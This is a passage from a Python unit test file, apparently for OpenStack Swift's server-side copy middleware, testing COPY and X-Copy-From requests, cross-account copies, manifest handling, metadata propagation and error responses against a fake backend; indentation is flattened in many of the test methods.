        self.assertRaises(HTTPException,
                          copy._check_destination_header, req)
class TestServerSideCopyMiddleware(unittest.TestCase):
    def setUp(self):
        """Build a FakeSwift backend wrapped by the copy middleware."""
        self.app = FakeSwift()
        self.ssc = copy.filter_factory({})(self.app)
        # Share the fake backend's logger so log output is captured.
        self.ssc.logger = self.app.logger
    def tearDown(self):
        # Every request body handed to the fake backend must be closed.
        self.assertEqual(self.app.unclosed_requests, {})
    def call_app(self, req, app=None, expect_exception=False):
        """Drive *app* (default: the raw FakeSwift backend) as a WSGI app.

        Installs a recording 'swift.authorize' hook so tests can inspect
        which sub-requests were authorized.  Returns (status, headers,
        body), plus the caught exception when *expect_exception* is true.
        """
        if app is None:
            app = self.app
        self.authorized = []

        def authorize(req):
            self.authorized.append(req)
        if 'swift.authorize' not in req.environ:
            req.environ['swift.authorize'] = authorize
        req.headers.setdefault("User-Agent", "Bruce Wayne")
        # start_response captures the status line and header list.
        status = [None]
        headers = [None]

        def start_response(s, h, ei=None):
            status[0] = s
            headers[0] = h
        body_iter = app(req.environ, start_response)
        body = ''
        caught_exc = None
        try:
            # appease the close-checker
            with closing_if_possible(body_iter):
                for chunk in body_iter:
                    body += chunk
        except Exception as exc:
            if expect_exception:
                caught_exc = exc
            else:
                raise
        if expect_exception:
            return status[0], headers[0], body, caught_exc
        else:
            return status[0], headers[0], body
    def call_ssc(self, req, **kwargs):
        """Like call_app, but routed through the copy middleware."""
        return self.call_app(req, app=self.ssc, **kwargs)
    def assertRequestEqual(self, req, other):
        """Assert two requests share the same method and path."""
        self.assertEqual(req.method, other.method)
        self.assertEqual(req.path, other.path)
    def test_no_object_in_path_pass_through(self):
        """Container-level requests bypass the copy middleware entirely."""
        self.app.register('PUT', '/v1/a/c', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c', method='PUT')
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '201 Created')
        self.assertEqual(len(self.authorized), 1)
        self.assertRequestEqual(req, self.authorized[0])
    def test_object_pass_through_methods(self):
        """Non-copy object methods pass straight through, unmodified."""
        for method in ['DELETE', 'GET', 'HEAD', 'REPLICATE']:
            self.app.register(method, '/v1/a/c/o', swob.HTTPOk, {})
            req = Request.blank('/v1/a/c/o', method=method)
            status, headers, body = self.call_ssc(req)
            self.assertEqual(status, '200 OK')
            self.assertEqual(len(self.authorized), 1)
            self.assertRequestEqual(req, self.authorized[0])
            # Middleware must not record an original method for pass-through.
            self.assertNotIn('swift.orig_req_method', req.environ)
def test_basic_put_with_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
self.assertEqual(self.app.swift_sources[0], 'SSC')
self.assertEqual(self.app.swift_sources[1], 'SSC')
# For basic test cases, assert orig_req_method behavior
self.assertNotIn('swift.orig_req_method', req.environ)
def test_static_large_object_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2?multipart-manifest=put',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2?multipart-manifest=get',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1],
('PUT', '/v1/a/c/o2?multipart-manifest=put'))
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_static_large_object(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'X-Static-Large-Object': 'True',
'Etag': 'should not be sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o2',
swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o2',
environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o2')])
req_headers = self.app.headers[1]
self.assertNotIn('X-Static-Large-Object', req_headers)
self.assertNotIn('Etag', req_headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container(self):
self.app.register('GET', '/v1/a/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o2', self.authorized[1].path)
def test_basic_put_with_x_copy_from_across_container_and_account(self):
self.app.register('GET', '/v1/a1/c1/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {},
'passed')
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
    def test_copy_non_zero_content_length(self):
        """A copy PUT with a non-zero body is rejected with 400."""
        req = Request.blank('/v1/a/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '10',
                                     'X-Copy-From': 'c1/o1'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '400 Bad Request')
    def test_copy_non_zero_content_length_with_account(self):
        """A cross-account copy PUT with a non-zero body is rejected."""
        req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '10',
                                     'X-Copy-From': 'c1/o1',
                                     'X-Copy-From-Account': 'a1'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '400 Bad Request')
def test_copy_with_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_slashes_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a1/c1/o/o1', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a2/c2/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a2/c2/o2', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c1/o/o1',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c1/o/o1') in headers)
self.assertTrue(('X-Copied-From-Account', 'a1') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c1/o/o1', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a2/c2/o2', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
# space in soure path
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_spaces_in_x_copy_from_and_account(self):
self.app.register('GET', '/v1/a/c/o o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
# space in soure path
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': 'c/o%20o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o o2', path)
self.assertTrue(('X-Copied-From', 'c/o%20o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o%20o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
# repeat tests with leading /
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_in_x_copy_from_and_account(self):
# repeat tests with leading /
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_leading_slash_and_slashes_in_x_copy_from_acct(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o/o2',
'X-Copy-From-Account': 'a'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o/o2', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
    def test_copy_with_no_object_in_x_copy_from(self):
        """X-Copy-From with only a container yields 412."""
        req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '412 Precondition Failed')
    def test_copy_with_no_object_in_x_copy_from_and_account(self):
        """Container-only X-Copy-From also fails with an account given."""
        req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c',
                                     'X-Copy-From-Account': 'a'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '412 Precondition Failed')
    def test_copy_with_bad_x_copy_from_account(self):
        """An account name containing slashes is rejected with 412."""
        req = Request.blank('/v1/a/c/o',
                            environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c/o',
                                     'X-Copy-From-Account': '/i/am/bad'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '412 Precondition Failed')
    def test_copy_server_error_reading_source(self):
        """A 503 from the source GET propagates to the client."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
        req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c/o'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '503 Service Unavailable')
    def test_copy_server_error_reading_source_and_account(self):
        """A 503 on the cross-account source GET stops before the PUT."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
        req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c/o',
                                     'X-Copy-From-Account': 'a'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '503 Service Unavailable')
        # Only the source GET was authorized; no destination PUT happened.
        self.assertEqual(len(self.authorized), 1)
        self.assertEqual('GET', self.authorized[0].method)
        self.assertEqual('/v1/a/c/o', self.authorized[0].path)
    def test_copy_not_found_reading_source(self):
        """A 404 from the source GET propagates to the client."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
        req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c/o'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '404 Not Found')
        # Only the source GET was authorized; no destination PUT happened.
        self.assertEqual(len(self.authorized), 1)
        self.assertEqual('GET', self.authorized[0].method)
        self.assertEqual('/v1/a/c/o', self.authorized[0].path)
    def test_copy_not_found_reading_source_and_account(self):
        """A 404 on the cross-account source GET stops before the PUT."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
        req = Request.blank('/v1/a1/c1/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c/o',
                                     'X-Copy-From-Account': 'a'})
        status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '404 Not Found')
        # Only the source GET was authorized; no destination PUT happened.
        self.assertEqual(len(self.authorized), 1)
        self.assertEqual('GET', self.authorized[0].method)
        self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_copy_with_object_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_copy_with_object_metadata_and_account(self):
self.app.register('GET', '/v1/a1/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o',
'X-Object-Meta-Ours': 'okay',
'X-Copy-From-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a1/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
    def test_copy_source_larger_than_max_file_size(self):
        """A source bigger than MAX_FILE_SIZE yields 413."""
        self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
        req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'Content-Length': '0',
                                     'X-Copy-From': '/c/o'})
        # Shrink the limit so the 9-byte body trips the size check.
        with mock.patch('swift.common.middleware.copy.'
                        'MAX_FILE_SIZE', 1):
            status, headers, body = self.call_ssc(req)
        self.assertEqual(status, '413 Request Entity Too Large')
        self.assertEqual(len(self.authorized), 1)
        self.assertEqual('GET', self.authorized[0].method)
        self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_basic_COPY(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
# For basic test cases, assert orig_req_method behavior
self.assertEqual(req.environ['swift.orig_req_method'], 'COPY')
def test_basic_DLO(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is not sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertNotIn('x-object-manifest', self.app.headers[1])
self.assertNotIn('etag', self.app.headers[1])
def test_basic_DLO_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o?multipart-manifest=get', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy'))
self.assertIn('x-object-manifest', self.app.headers[1])
self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path')
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
    def test_COPY_source_metadata(self):
        """Sysmeta/meta/transient-sysmeta and override headers survive a
        copy; etag and the container-update overrides are dropped when the
        copy uses a Range header."""
        source_headers = {
            'x-object-sysmeta-test1': 'copy me',
            'x-object-meta-test2': 'copy me too',
            'x-object-transient-sysmeta-test3': 'ditto',
            'x-object-sysmeta-container-update-override-etag': 'etag val',
            'x-object-sysmeta-container-update-override-size': 'size val',
            'x-object-sysmeta-container-update-override-foo': 'bar',
            'x-delete-at': 'delete-at-time'}
        get_resp_headers = source_headers.copy()
        get_resp_headers['etag'] = 'source etag'
        self.app.register(
            'GET', '/v1/a/c/o', swob.HTTPOk,
            headers=get_resp_headers, body='passed')

        def verify_headers(expected_headers, unexpected_headers,
                           actual_headers):
            # Consumes expected_headers as matches are found, then asserts
            # everything expected was seen and nothing unexpected was.
            for k, v in actual_headers:
                if k.lower() in expected_headers:
                    expected_val = expected_headers.pop(k.lower())
                    self.assertEqual(expected_val, v)
                self.assertNotIn(k.lower(), unexpected_headers)
            self.assertFalse(expected_headers)
        # use a COPY request
        self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='COPY',
                            headers={'Content-Length': 0,
                                     'Destination': 'c/o-copy0'})
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('201 Created', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o-copy0', path)
        verify_headers(source_headers.copy(), [], put_headers.items())
        self.assertIn('etag', put_headers)
        self.assertEqual(put_headers['etag'], 'source etag')
        req = Request.blank('/v1/a/c/o-copy0', method='GET')
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('200 OK', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        # use a COPY request with a Range header
        self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='COPY',
                            headers={'Content-Length': 0,
                                     'Destination': 'c/o-copy1',
                                     'Range': 'bytes=1-2'})
        status, resp_headers, body = self.call_ssc(req)
        expected_headers = source_headers.copy()
        unexpected_headers = (
            'x-object-sysmeta-container-update-override-etag',
            'x-object-sysmeta-container-update-override-size',
            'x-object-sysmeta-container-update-override-foo')
        for h in unexpected_headers:
            expected_headers.pop(h)
        self.assertEqual('201 Created', status)
        verify_headers(expected_headers, unexpected_headers, resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o-copy1', path)
        verify_headers(
            expected_headers, unexpected_headers, put_headers.items())
        # etag should not be copied with a Range request
        self.assertNotIn('etag', put_headers)
        req = Request.blank('/v1/a/c/o-copy1', method='GET')
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('200 OK', status)
        verify_headers(expected_headers, unexpected_headers, resp_headers)
        # use a PUT with x-copy-from
        self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o-copy2', method='PUT',
                            headers={'Content-Length': 0,
                                     'X-Copy-From': 'c/o'})
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('201 Created', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o-copy2', path)
        verify_headers(source_headers.copy(), [], put_headers.items())
        self.assertIn('etag', put_headers)
        self.assertEqual(put_headers['etag'], 'source etag')
        req = Request.blank('/v1/a/c/o-copy2', method='GET')
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('200 OK', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        # copy to same path as source
        self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
        req = Request.blank('/v1/a/c/o', method='PUT',
                            headers={'Content-Length': 0,
                                     'X-Copy-From': 'c/o'})
        status, resp_headers, body = self.call_ssc(req)
        self.assertEqual('201 Created', status)
        verify_headers(source_headers.copy(), [], resp_headers)
        method, path, put_headers = self.app.calls_with_headers[-1]
        self.assertEqual('PUT', method)
        self.assertEqual('/v1/a/c/o', path)
        verify_headers(source_headers.copy(), [], put_headers.items())
        self.assertIn('etag', put_headers)
        self.assertEqual(put_headers['etag'], 'source etag')
def test_COPY_no_destination_header(self):
req = Request.blank(
'/v1/a/c/o', method='COPY', headers={'Content-Length': 0})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
self.assertEqual(len(self.authorized), 0)
def test_basic_COPY_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o2',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o2', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path)
def test_COPY_across_containers(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
